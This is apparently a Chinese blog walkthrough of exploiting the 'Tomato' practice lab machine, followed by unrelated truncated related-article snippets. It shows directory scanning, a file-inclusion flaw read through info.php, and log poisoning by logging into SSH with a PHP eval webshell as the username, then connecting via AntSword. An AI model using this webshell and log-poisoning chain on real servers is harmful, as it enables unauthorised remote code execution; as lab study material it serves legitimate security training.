TOMATO靶机漏洞复现
步骤一,我们来到tomato页面
什么也弄不了只有一番茄图片
弱口令不行,xxs也不行,xxe还是不行
我们来使用kali来操作...
步骤二,使用dirb再扫一下, dirb http://172.16.1.133
1.发现这个文件可以访问.我们来访问一下
/antibot_image/
2.我们来看看他文件里面有什么东西是我们可以利用的!
3.找到网站绝对路径 info.php我们来点击进去
4.查看页面源代码 可以发现image的文件包含.
5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞
最下边
步骤三,将一句话木马作为ssh登录的用户名登录
1.输入
ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。
2.页面通过image传参查看日志文件
/var/log/auth.log
这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了
发现多了一些报错信息,大概率写入木马成功.
步骤四,直接使用蚁剑进行连接:
http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log
密码:cmd
连接成功
相关文章:
TOMATO靶机漏洞复现
步骤一,我们来到tomato页面 什么也弄不了只有一番茄图片 弱口令不行,xxs也不行,xxe还是不行 我们来使用kali来操作... 步骤二,使用dirb再扫一下, dirb http://172.16.1.133 1.发现这个文件可以访问.我们来访问一下 /antibot_i…...
高基数 GroupBy 在 SLS SQL 中的查询加速
作者:顾汉杰(执少) 什么是高基数 GroupBy 简单来说,想要分析的数据,拥有超多的“唯一值计数”(Distinct Count),而我们需要对这些数据进行分组分析(如统计次数、排名、…...
TP5队列和TP5 使用redis 等相关
TP5.thinkphp之门面(facade类)面试_thinkphp facade-CSDN博客 TP5中的消息队列_tp 5.0 队列 release 时间单位-CSDN博客 thinkphp-queue自带的队列包使用分析_php think queue:listen-CSDN博客TP5 使用redis_tp5 redis-CSDN博客...
【R语言速通】1.数据类型
文章目录 0. 变量名1.基本数据类型1.1 数值型1.2 整型1.3 复数型1.4 逻辑型1.5 字符型 2.复合数据类型2.1 向量向量操作向量的常用函数 2.2 矩阵矩阵操作矩阵的常用函数 2.3 数组数组的操作数据的运算数组的访问数组的维度操作 数组的常用函数 2.4 数据框数据框操作数据框的常用…...
创建型模式:单例模式)
【C++设计模式】(三)创建型模式:单例模式
文章目录 (三)创建型模式:单例模式饿汉式懒汉式饿汉式 v.s. 懒汉式 (三)创建型模式:单例模式 单例模式在于确保一个类只有一个实例,并提供一个全局访问点来访问该实例。在某些情况下࿰…...
基于Android Studio的行程记录APK开发指南(三)---界面设计及两种方法获取用户位置
前言 本系列教程我们来看看如何使用Android Studio去开发一个APK用于用户的实时行程记录 第一期:基于Android Studio的用户行程记录APK开发指南(一):项目基础配置与速通Kotlin-CSDN博客第二期:基于Android Studio的行程记录APK开发指南(二):…...
大厂趋势:低代码不等于低能力,赋能高效开发新纪元
大厂趋势:低代码不等于低能力,赋能高效开发新纪元 在数字化转型的浪潮中,科技巨头(大厂)作为行业的引领者,不断探索和创新,以应对日益复杂多变的市场需求和技术挑战。其中,“低代码…...
CentOS全面停服,国产化提速,央国企信创即时通讯/协同门户如何选型?
01. CentOS停服带来安全新风险, 国产操作系统迎来新的发展机遇 2024年6月30日,CentOS 7版本全面停服,于2014年发布的开源类服务器操作系统——CentOS全系列版本生命周期画上了句号。国内大量基于CentOS开发和适配的服务器及平台,…...
如何确定Kubernetes是在采用哪种方式进行部署的?
这里写目录标题 1. 查看 Kubernetes 安装方式的常见文件和工具2. 检查 Kubernetes 的节点信息3. 检查 Kubernetes API 服务器的版本信息4. 检查系统服务和容器5. 查看安装文档或管理员笔记为什么可以确定是 kubeadm 部署?下一步确认 如果存在多个master节点…...
【PostgreSQL】地理空间数据的数据类型定义、索引优化、查询优化策略
PostgreSQL 是开源关系型数据库,对于地理空间数据的处理提供了很好的支持。在处理地理空间数据时,优化索引和查询的性能至关重要,因为地理空间操作通常涉及大量的数据计算和复杂的几何形状比较。 一、地理空间数据类型 注意geometry和geogra…...
RocketMQ广播消费消息
1、 基础概念 RocketMQ 支持两种消息模式:集群消费( Clustering )和广播消费( Broadcasting )。 集群消费模式(Cluster): 在集群消费模式下,同一个消费者组(…...
枚举)
C#基础(2)枚举
前言 我们其实在前面已经了解过枚举到底有什么作用,但是那毕竟是概念性的语言,理解起来很抽象,今天我们会具体来讲一讲枚举,并谈一谈它的应用。 希望你能从今天的C#基础中有所收获。 基本概念 1.枚举:是一个比较特…...
Linux之MySQL日志
前言 数据库就像一个庞大的图书馆,而日志则是记录这个图书馆内每一本书的目录。正如在图书馆中找到特定书籍一样,数据库日志帮助我们追溯数据的变更、定位问题和还原状态。 在MySQL中,日志是非常重要的一个组成部分,它记录了数据…...
Redis集群模式—主从集群、哨兵集群、分片集群
主从集群 主从模式中,包括一个主节点(Master)和一个或多个从节点(Slave)。主节点负责处理所有写操作和读操作,而从节点则复制主节点的数据,并且只能处理读操作。当主节点发生故障时,…...
并发工具类(二):CyclicBarrier
1、CyclicBarrier 介绍 从字面上看 CyclicBarrier 就是 一个循环屏障,它也是一个同步助手工具,它允许多个线程 在执行完相应的操作后彼此等待共同到达一个屏障点。 CyclicBarrier可以被循环使用,当屏障点值变为0之后,可以在接下来…...
Spring Cloud全解析:负载均衡之Ribbon简介
Ribbon简介 Ribbon是一种客户端的软件负载均衡算法,将Netflix的中间层服务连接在一起,提供了一系列完善的配置如连接超时、重试等,Ribbon会自动的帮助基于某种规则(如简单轮询、随机连接等)去连接那些机器,也可以自定义的负载均衡…...
Kettle安装与使用指南
1. 介绍 什么是Kettle? Kettle,全称Pentaho Data Integration (PDI),是Pentaho BI套件的一部分。它提供了一个可视化的ETL工具,允许用户通过图形界面设计复杂的数据集成流程。Kettle支持多种数据源,包括关系型数据库…...
教育行业解决方案:智能PPT在教育行业的创新应用
在信息化时代,教育行业面临着巨大的变革。随着人工智能技术的不断发展,传统教学方式正在被重新定义。彩漩科技作为 AI 技术的先行者,推出了歌者 PPT &彩漩 PPT,为教师、学生和家长提供了一种全新的教育体验,实现了…...
Matlab程序练习
Part1 1.求 [100,999] 之间能被 21整除的数的个数。 程序: 主文件:main.m clear; start_num 100; end_num 999; div_num 21; res div(start_num,end_num,div_num); fprintf("[%d,%d]之间能被%d整除的数的个数为%d个\n",start_num,end_…...
cesium可不可以改变影像底图颜色,如何给地球底图影像添加一层滤镜蒙版?
废话:你的球是不是很丑?是不是没有科技感?是不是没有好看的影像? 因果: 因:客户问,底图可不可以改变颜色,想让球更漂亮一些。 答:可以改变影像饱和度,透明度…...
Qwen3-0.6B-FP8快速上手:用Chainlit打造专属聊天机器人实战
Qwen3-0.6B-FP8快速上手:用Chainlit打造专属聊天机器人实战 1. 准备工作与环境检查 1.1 了解Qwen3-0.6B-FP8模型 Qwen3-0.6B-FP8是Qwen系列最新一代的语言模型,采用FP8精度优化,在保持高性能的同时显著降低计算资源需求。这个60亿参数的模…...
零代码:CAM++说话人识别系统,可视化界面完成语音比对
零代码:CAM说话人识别系统,可视化界面完成语音比对 1. 系统概述 CAM说话人识别系统是一款基于深度学习的声纹识别工具,通过直观的可视化界面让用户无需编写代码即可完成语音比对和特征提取。该系统由开发者"科哥"基于阿里达摩院开…...
【现代通信技术】SDH技术:从PDH到SDH的演进与核心优势解析
1. 从电缆时代到光纤革命:PDH与SDH的技术分野 记得刚入行那会儿,师傅带着我维护老式通信设备,成捆的电缆像蜘蛛网般盘踞在机房。那时候的准同步数字体系(PDH)就像用不同方言交流的邻居——北美用E1(1.544Mb…...
Fish Speech 1.5部署教程:CSDN平台GPU实例网络策略与安全组配置
Fish Speech 1.5部署教程:CSDN平台GPU实例网络策略与安全组配置 想用AI生成媲美真人的语音,但被复杂的部署和网络配置劝退?今天,我们就来手把手解决这个问题。Fish Speech 1.5,这个基于海量数据训练的先进语音合成模型…...
解密GPCRs二级结合口袋:从β2AR到5HT2BR的偏置信号传导机制
解密GPCRs二级结合口袋:从β2AR到5HT2BR的偏置信号传导机制 在结构药理学领域,G蛋白偶联受体(GPCRs)的配体结合机制研究一直是药物开发的核心课题。传统研究多聚焦于正位结合位点(Orthosteric Binding Site, OBS),而近年来,二级结…...
别再让API账单吓到你了!Gemini 3 Flash的`thinking_level`参数保姆级调优实战
别再让API账单吓到你了!Gemini 3 Flash的thinking_level参数保姆级调优实战 当开发者第一次看到Gemini API的月度账单时,那种震惊感不亚于发现信用卡被盗刷。我们团队曾经有个项目,仅仅因为没注意参数配置,单月API支出就超过了服务…...
避开这些坑!Unity WebGL本地部署Nginx的5个关键配置点
Unity WebGL本地Nginx部署避坑指南:5个关键配置解析 当Unity开发者将项目导出为WebGL格式并在本地通过Nginx部署时,常常会遇到各种棘手的配置问题。本文聚焦五个最容易被忽视却至关重要的配置环节,帮助开发者绕过常见陷阱,实现顺畅…...
 智能薪酬激励,Agent时代的“薪”模式)
易薪路(eRoad) 智能薪酬激励,Agent时代的“薪”模式
每个月的发薪日,对很多企业的 HR、C&B 团队来说,都不是一个轻松的节点。当考勤、绩效、奖金、福利补贴、计件工资、佣金提成等数十项数据从十几个系统里涌来,当线下 Excel 表格堆成山,当不同部门、不同地区、不同岗位的薪资方…...
九,附录 B:响应周期公式
九,附录 B:响应周期公式九,附录 B:响应周期公式九,附录 B:响应周期公式 A2B_RESPCYCS 寄存器用于设置从控制帧(SCF)开始到最后一个从节点用响应帧(SRF)进行响…...
Go-multierror 实战案例:10个常见场景的错误处理优化
Go-multierror 实战案例:10个常见场景的错误处理优化 【免费下载链接】go-multierror A Go (golang) package for representing a list of errors as a single error. 项目地址: https://gitcode.com/gh_mirrors/go/go-multierror 在Go语言开发中,…...